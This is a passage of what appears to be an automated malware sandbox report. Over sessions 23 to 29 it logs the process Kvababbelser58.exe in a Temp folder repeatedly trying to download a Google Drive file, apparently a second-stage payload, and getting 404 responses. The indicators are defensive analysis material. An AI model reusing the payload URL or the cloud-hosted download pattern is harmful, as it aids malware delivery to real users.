                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      23192.168.2.749992142.250.181.2254435912C:\Users\user\AppData\Local\Temp\Kvababbelser58.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2025-01-10 23:50:26 UTC468OUTGET /download?id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm&export=download HTTP/1.1
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                      Cache-Control: no-cache
                                                                                                      Host: drive.usercontent.google.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Cookie: NID=520=V6MDbDdmBBfTI7wi225z_j7TZyDNjWU74kmeNCQsNiblTjWRc4Mu5JON2RiZcuFOOxnGyG_SSY3Waq3RBMprjf_8oFvLztOIshZYf1lihO2shPJH8wrYxKO04hxfLJ3eD1iiOm1Em8vndvH2AZj3aW6PLgj5AUPZkgwAx3DaTUcOLW1SwEBnGNvzWspCmGGE
                                                                                                      2025-01-10 23:50:27 UTC1851INHTTP/1.1 404 Not Found
                                                                                                      X-GUploader-UploadID: AFIdbgSY6dbrpVgWGHMfOY8F0UFdJ9Z0KveMhvzTpappJTYwx_Ps17BWNKVzmv1he_wyCsNJqel7NRQ
                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                      Pragma: no-cache
                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                      Date: Fri, 10 Jan 2025 23:50:27 GMT
                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                      Content-Security-Policy: script-src 'nonce-n8-_fx-xPXjID3G9y-_ePg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                      Content-Length: 1652
                                                                                                      Server: UploadServer
                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                      Connection: close
                                                                                                      2025-01-10 23:50:27 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 76 62 78 5a 6c 4d 31 37 52 6b 52 72 75 4c 66 4f 68 4c 44 50 50 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="vbxZlM17RkRruLfOhLDPPQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      24192.168.2.749993216.58.206.464435912C:\Users\user\AppData\Local\Temp\Kvababbelser58.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2025-01-10 23:50:28 UTC426OUTGET /uc?export=download&id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm HTTP/1.1
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                      Host: drive.google.com
                                                                                                      Cache-Control: no-cache
                                                                                                      Cookie: NID=520=V6MDbDdmBBfTI7wi225z_j7TZyDNjWU74kmeNCQsNiblTjWRc4Mu5JON2RiZcuFOOxnGyG_SSY3Waq3RBMprjf_8oFvLztOIshZYf1lihO2shPJH8wrYxKO04hxfLJ3eD1iiOm1Em8vndvH2AZj3aW6PLgj5AUPZkgwAx3DaTUcOLW1SwEBnGNvzWspCmGGE
                                                                                                      2025-01-10 23:50:28 UTC1920INHTTP/1.1 303 See Other
                                                                                                      Content-Type: application/binary
                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                      Pragma: no-cache
                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                      Date: Fri, 10 Jan 2025 23:50:28 GMT
                                                                                                      Location: https://drive.usercontent.google.com/download?id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm&export=download
                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                      Content-Security-Policy: script-src 'nonce-DcKtXysVwIiMRsgQQwoC1Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                      Server: ESF
                                                                                                      Content-Length: 0
                                                                                                      X-XSS-Protection: 0
                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      25192.168.2.749994142.250.181.2254435912C:\Users\user\AppData\Local\Temp\Kvababbelser58.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2025-01-10 23:50:29 UTC468OUTGET /download?id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm&export=download HTTP/1.1
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                      Cache-Control: no-cache
                                                                                                      Host: drive.usercontent.google.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Cookie: NID=520=V6MDbDdmBBfTI7wi225z_j7TZyDNjWU74kmeNCQsNiblTjWRc4Mu5JON2RiZcuFOOxnGyG_SSY3Waq3RBMprjf_8oFvLztOIshZYf1lihO2shPJH8wrYxKO04hxfLJ3eD1iiOm1Em8vndvH2AZj3aW6PLgj5AUPZkgwAx3DaTUcOLW1SwEBnGNvzWspCmGGE
                                                                                                      2025-01-10 23:50:29 UTC1851INHTTP/1.1 404 Not Found
                                                                                                      X-GUploader-UploadID: AFIdbgQX0vdYM1Iova-R5sUZlx9ZdzEhl8_W2UiYIcbt25FN7r-laO14idiGfsa_rY_XGdTyZ7Nfibc
                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                      Pragma: no-cache
                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                      Date: Fri, 10 Jan 2025 23:50:29 GMT
                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                      Content-Security-Policy: script-src 'nonce-7aa_Hja7sXYGL4bArwtT4Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                      Content-Length: 1652
                                                                                                      Server: UploadServer
                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                      Connection: close
                                                                                                      2025-01-10 23:50:29 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 41 4b 55 4b 67 4a 42 72 68 72 35 32 4e 64 66 2d 56 41 56 5a 52 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="AKUKgJBrhr52Ndf-VAVZRw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      26192.168.2.749995216.58.206.464435912C:\Users\user\AppData\Local\Temp\Kvababbelser58.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2025-01-10 23:50:30 UTC426OUTGET /uc?export=download&id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm HTTP/1.1
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                      Host: drive.google.com
                                                                                                      Cache-Control: no-cache
                                                                                                      Cookie: NID=520=V6MDbDdmBBfTI7wi225z_j7TZyDNjWU74kmeNCQsNiblTjWRc4Mu5JON2RiZcuFOOxnGyG_SSY3Waq3RBMprjf_8oFvLztOIshZYf1lihO2shPJH8wrYxKO04hxfLJ3eD1iiOm1Em8vndvH2AZj3aW6PLgj5AUPZkgwAx3DaTUcOLW1SwEBnGNvzWspCmGGE
                                                                                                      2025-01-10 23:50:30 UTC1920INHTTP/1.1 303 See Other
                                                                                                      Content-Type: application/binary
                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                      Pragma: no-cache
                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                      Date: Fri, 10 Jan 2025 23:50:30 GMT
                                                                                                      Location: https://drive.usercontent.google.com/download?id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm&export=download
                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                      Content-Security-Policy: script-src 'nonce-pOkPaRbp-Y3kGhv7JeX4hg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                      Server: ESF
                                                                                                      Content-Length: 0
                                                                                                      X-XSS-Protection: 0
                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      27192.168.2.749996142.250.181.2254435912C:\Users\user\AppData\Local\Temp\Kvababbelser58.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2025-01-10 23:50:31 UTC468OUTGET /download?id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm&export=download HTTP/1.1
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                      Cache-Control: no-cache
                                                                                                      Host: drive.usercontent.google.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Cookie: NID=520=V6MDbDdmBBfTI7wi225z_j7TZyDNjWU74kmeNCQsNiblTjWRc4Mu5JON2RiZcuFOOxnGyG_SSY3Waq3RBMprjf_8oFvLztOIshZYf1lihO2shPJH8wrYxKO04hxfLJ3eD1iiOm1Em8vndvH2AZj3aW6PLgj5AUPZkgwAx3DaTUcOLW1SwEBnGNvzWspCmGGE
                                                                                                      2025-01-10 23:50:31 UTC1851INHTTP/1.1 404 Not Found
                                                                                                      X-GUploader-UploadID: AFiumC6wYjaMnsKYP8Z_EKDepRHGTqY6CS_aMdTIqeXFZ7lvSxbrfMy-RHs7plxlN8ho-J4bkA7ca74
                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                      Pragma: no-cache
                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                      Date: Fri, 10 Jan 2025 23:50:31 GMT
                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                      Content-Security-Policy: script-src 'nonce-gxAafJmN17SefH3yfGHOMA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                      Content-Length: 1652
                                                                                                      Server: UploadServer
                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                      Connection: close
                                                                                                      2025-01-10 23:50:31 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 57 74 75 31 63 31 7a 39 66 50 73 36 34 56 41 7a 5a 52 55 68 38 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Wtu1c1z9fPs64VAzZRUh8w">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      28192.168.2.749997216.58.206.464435912C:\Users\user\AppData\Local\Temp\Kvababbelser58.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2025-01-10 23:50:32 UTC426OUTGET /uc?export=download&id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm HTTP/1.1
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                      Host: drive.google.com
                                                                                                      Cache-Control: no-cache
                                                                                                      Cookie: NID=520=V6MDbDdmBBfTI7wi225z_j7TZyDNjWU74kmeNCQsNiblTjWRc4Mu5JON2RiZcuFOOxnGyG_SSY3Waq3RBMprjf_8oFvLztOIshZYf1lihO2shPJH8wrYxKO04hxfLJ3eD1iiOm1Em8vndvH2AZj3aW6PLgj5AUPZkgwAx3DaTUcOLW1SwEBnGNvzWspCmGGE
                                                                                                      2025-01-10 23:50:33 UTC1920INHTTP/1.1 303 See Other
                                                                                                      Content-Type: application/binary
                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                      Pragma: no-cache
                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                      Date: Fri, 10 Jan 2025 23:50:32 GMT
                                                                                                      Location: https://drive.usercontent.google.com/download?id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm&export=download
                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                      Content-Security-Policy: script-src 'nonce-Hq6E1yAmZsOKmw0JJ69GRA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                      Server: ESF
                                                                                                      Content-Length: 0
                                                                                                      X-XSS-Protection: 0
                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      29192.168.2.749998142.250.181.2254435912C:\Users\user\AppData\Local\Temp\Kvababbelser58.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2025-01-10 23:50:33 UTC468OUTGET /download?id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm&export=download HTTP/1.1
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                      Cache-Control: no-cache
                                                                                                      Host: drive.usercontent.google.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Cookie: NID=520=V6MDbDdmBBfTI7wi225z_j7TZyDNjWU74kmeNCQsNiblTjWRc4Mu5JON2RiZcuFOOxnGyG_SSY3Waq3RBMprjf_8oFvLztOIshZYf1lihO2shPJH8wrYxKO04hxfLJ3eD1iiOm1Em8vndvH2AZj3aW6PLgj5AUPZkgwAx3DaTUcOLW1SwEBnGNvzWspCmGGE
                                                                                                      2025-01-10 23:50:34 UTC1844INHTTP/1.1 404 Not Found
                                                                                                      X-GUploader-UploadID: AFIdbgTLIssDCzWFbOUwNqpzT03KRKDhfGwvgQcFexUw5z4Xoqqwiw90Ov1sunmqxyUMO031
                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                      Pragma: no-cache
                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                      Date: Fri, 10 Jan 2025 23:50:34 GMT
                                                                                                      Content-Security-Policy: script-src 'nonce-onz_QF8a5M-uPghnW9aw_A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                      Content-Length: 1652
                                                                                                      Server: UploadServer
                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                      Connection: close
                                                                                                      2025-01-10 23:50:34 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 71 76 6f 70 79 6c 45 67 46 4b 62 48 68 53 76 55 32 30 6c 4d 49 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="qvopylEgFKbHhSvU20lMIw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
